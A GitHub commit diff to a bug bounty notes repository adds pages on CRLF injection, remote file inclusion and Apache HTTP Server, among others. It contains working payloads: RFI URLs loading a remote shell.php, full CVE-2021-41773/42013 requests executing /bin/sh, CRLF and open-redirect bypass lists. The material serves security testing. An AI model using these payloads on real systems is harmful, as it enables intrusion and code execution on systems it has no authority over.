Skip to content

Commit

Permalink
Add 'Where to find' in each readme, add Apache + CRLF + RFI
Browse files Browse the repository at this point in the history
  • Loading branch information
Muhammad Daffa committed Jun 22, 2022
1 parent fdaf048 commit abd025f
Showing 22 changed files with 211 additions and 25 deletions.
12 changes: 10 additions & 2 deletions Arbitrary File Upload.md
Original file line number Diff line number Diff line change
@@ -1,5 +1,13 @@
# Bypass File Upload
1. Change the ContentType
# Arbitrary File Upload

## Introduction
An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.

## Where to find
In upload file feature, for example upload photo profile feature

## How to exploit
1. Change the `Content-Type` value
```
POST /images/upload/ HTTP/1.1
Host: target.com
5 changes: 4 additions & 1 deletion Business Logic Errors.md
Original file line number Diff line number Diff line change
@@ -3,7 +3,10 @@
## Introduction
Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization.

## How to find
## Where to find
This vulnerability can appear in all features of the application.

## How to exploit
1. Review Functionality
- Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
- Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.
2 changes: 1 addition & 1 deletion Bypass/Bypass Captcha.md
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
# Bypass Captcha
# Bypass Captcha (Google reCAPTCHA)

1. Try changing the request method, for example POST to GET
```
35 changes: 35 additions & 0 deletions CRLF Injection.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
# CRLF Injection

## Introduction
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.

## Where to find
It can be found anywhere, always check the request and response. Try to search for parameters that lead to redirects, you can see the response is (301, 302, 303, 307, 308).

## How to exploit
1. Basic payload
```
https://example.com/?lang=en%0D%0ALocation:%20https://evil.com/
```
The response is
```
HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Set-Cookie: language=en
Location: https://evil.com/
```

2. Double encode
```
https://example.com/?lang=en%250D%250ALocation:%20https://evil.com/
```

3. Bypass unicode
```
https://example.com/?lang=en%E5%98%8A%E5%98%8DLocation:%20https://evil.com/
```

## References
* [@filedescriptor](https://blog.innerht.ml/twitter-crlf-injection/)
* [EdOverflow](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md)
8 changes: 7 additions & 1 deletion Cross Site Request Forgery.md
Original file line number Diff line number Diff line change
@@ -3,6 +3,9 @@
## Introduction
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated

## How to find
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)

## How to exploit
1. HTML GET Method

@@ -37,4 +40,7 @@ xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhr.send('{"role":admin}');
</script>
```
```

5. Multipart request
Soon
5 changes: 4 additions & 1 deletion Cross Site Scripting.md
Original file line number Diff line number Diff line change
@@ -12,7 +12,10 @@ Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious s

A type of XSS that has payloads found in the DOM rather than within the HTML code.

## **How to exploit**
## Where to find
This vulnerability can appear in all features of the application. If you want to find Dom-based XSS, you can find it by reading the javascript source code.

## How to exploit
1. Basic payload
```html
<script>alert(1)</script>
5 changes: 4 additions & 1 deletion Denial Of Service.md
Original file line number Diff line number Diff line change
@@ -2,8 +2,11 @@

## Introduction
Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it
## How to FInd

## Where to find
This vulnerability can appear in all features of the application. Depending on how to exploit it, for example in the file upload feature, you can upload very large files

## How to exploit
1. Cookie bomb

```
5 changes: 4 additions & 1 deletion Exposed Source Code.md
Original file line number Diff line number Diff line change
@@ -3,7 +3,10 @@
## Introduction
Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.

## How to FInd
## Where to find
`-`

## How to exploit
1. Exposed Git folder
```
https://site.com/.git
3 changes: 3 additions & 0 deletions Host Header Injection.md
Original file line number Diff line number Diff line change
@@ -3,6 +3,9 @@
## Introduction
HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks.

## Where to find
In the feature where the website can send email to us. For example forgot password / newsletter.

## How to exploit
1. Change the host header
```
6 changes: 5 additions & 1 deletion Insecure Direct Object References.md
Original file line number Diff line number Diff line change
@@ -3,7 +3,11 @@
## Introduction
IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.

## How to FInd
## Where to find
- Usually it can be found in APIs.
- Check the HTTP request that contain unique ID, for example `user_id` or `id`

## How to exploit
1. Add parameters onto the endpoints for example, if there was
```
GET /api/v1/getuser
5 changes: 4 additions & 1 deletion Local File Inclusion.md
Original file line number Diff line number Diff line change
@@ -1,8 +1,11 @@
## Local File Inclusion
## Local File Inclusion (LFI)

## Introduction
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server

## Where to find
- Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html`

## How to exploit
1. Basic payload
```
5 changes: 4 additions & 1 deletion OAuth Misconfiguration.md
Original file line number Diff line number Diff line change
@@ -3,7 +3,10 @@
## Introduction
The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the victim's account.

## How to find
## Where to find
In the SSO feature. For example `Log in with google` or `Log in with facebook`.

## How to exploit
1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses).
2. Change Referral header to attacker.com while requesting OAuth.
3. Create an account with victim@gmail.com with normal functionality. Create account with victim@gmail.com using OAuth functionality. Now try to login using previous credentials.
6 changes: 5 additions & 1 deletion Open Redirect.md
Original file line number Diff line number Diff line change
@@ -3,7 +3,11 @@
## Introduction
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain

## How to Find
## Where to find
- Sometimes it can be found in login / register / logout pages
- Checking the javascript source code

## How to exploit
1. Try change the domain
```
/?redir=evil.com
5 changes: 4 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -9,6 +9,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
## List
- [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md)
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
- [CRLF Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CRLF%20Injection.md)
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
@@ -17,9 +18,10 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
- [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md)
- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
- SQL Injection (SOON)
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
- [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
- SQL Injection (SOON)
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)

## List Bypass
@@ -41,6 +43,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)

## Technologies
- [Apache (HTTP Server)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Apache%20HTTP%20Server.md)
- [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
31 changes: 31 additions & 0 deletions Remote File Inclusion.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
## Remote File Inclusion (RFI)

## Introduction
Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts.

## Where to find
- Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html`

## How to exploit
1. Basic payload
```
http://example.com/index.php?page=http://daffa.info/shell.php
```

2. URL encoding
```
http://example.com/index.php?page=http%3A%2F%2Fdaffa.info%2Fshell.php
```

3. Double encoding
```
http://example.com/index.php?page=http%253A%252F%252Fdaffa.info%252Fshell.php
```

4. Using Null Byte (%00)
```
http://example.com/index.php?page=http://daffa.info/shell.php%00
```

## References
* [payloadbox](https://github.com/payloadbox/rfi-lfi-payload-list)
42 changes: 42 additions & 0 deletions Technologies/Apache HTTP Server.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
# Apache (HTTP Server) Common Bugs

## Introduction
What would you do if you came across a website that uses Apache (HTTP Server)?

## How to Detect
Usually in the HTTP response there is a header like this `Server: Apache` or `Server: Apache/2.4.50` and check the 404 page

1. Find the related CVE by checking Apache (HTTP Server) version
* How to find the Apache (HTTP Server) version

By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated Apache (HTTP Server) version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/Apache-Http-Server.html)

Some example CVE:

- CVE-2021-41773 (RCE and LFI)
```
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close
echo;id
```
- CVE-2021-42013 (RCE and LFI)
```
POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
echo;id
```
4 changes: 1 addition & 3 deletions Technologies/Confluence.md
Original file line number Diff line number Diff line change
@@ -4,9 +4,7 @@
What would you do if you came across a website that uses Confluence?

## How to Detect
```
https://example.com/login.action?os_destination=%2F
```
Try to HTTP request to `https://example.com/login.action?os_destination=%2F` and there is a form login

1. Find the related CVE by checking Confluence version
* How to find the Confluence version
2 changes: 1 addition & 1 deletion Technologies/HAProxy.md
Original file line number Diff line number Diff line change
@@ -4,7 +4,7 @@
What would you do if you came across a website that uses HAProxy?

## How to Detect
-
`-`

1. CVE-2021-40346 (HTTP Request Smuggling)
```
5 changes: 1 addition & 4 deletions Technologies/Jira.md
Original file line number Diff line number Diff line change
@@ -4,10 +4,7 @@
What would you do if you came across a website that uses Jira?

## How to Detect
```
https://example.com/secure/Dashboard.jspa
https://example.com/login.jsp
```
Try to HTTP request to `https://example.com/secure/Dashboard.jspa` or `https://example.com/login.jsp` and there is a form login

1. Find the related CVE by checking jira version
* How to find the jira version
38 changes: 36 additions & 2 deletions Technologies/Nginx.md
Original file line number Diff line number Diff line change
@@ -21,7 +21,41 @@ https://example.com/folder1/folder2/static../static/main.css
https://example.com/folder1/folder2/static../%s/main.css
```

3. Nginx status page
3. Open redirect
This is because of misconfiguration
```
https://example.com/%5cevil.com
https://example.com////\;@evil.com
https://example.com////evil.com
https://example.com///evil.com
https://example.com///evil.com/%2f%2e%2e
https://example.com///evil.com@//
https://example.com///{{RootURL}}evil.com/%2f%2e%2e
https://example.com//;@evil.com
https://example.com//\/evil.com/
https://example.com//\@evil.com
https://example.com//\evil.com
https://example.com//\tevil.com/
https://example.com//evil.com/%2F..
https://example.com//evil.com//
https://example.com//evil.com@//
https://example.com//evil.com\tevil.com/
https://example.com//https://evil.com@//
https://example.com/<>//evil.com
https://example.com/\/\/evil.com/
https://example.com/\/evil.com
https://example.com/\evil.com
https://example.com/evil.com
https://example.com/evil.com/%2F..
https://example.com/evil.com/
https://example.com/evil.com/..;/css
https://example.com/https:evil.com
```

4. Nginx status page
```
https://example.com/nginx_status
```
```

## References
- [Detectify](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)
2 changes: 1 addition & 1 deletion Technologies/Zend.md
Original file line number Diff line number Diff line change
@@ -4,7 +4,7 @@
What would you do if you came across a website that uses Zend?

## How to Detect
-
`-`

1. Finding config files
```
5 changes: 4 additions & 1 deletion Web Cache Poisoning.md
Original file line number Diff line number Diff line change
@@ -3,7 +3,10 @@
## Introduction
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.

## How to FInd
## Where to find
`-`

## How to exploit
1. Basic poisoning
```
GET / HTTP/1.1

0 comments on commit abd025f

Please sign in to comment.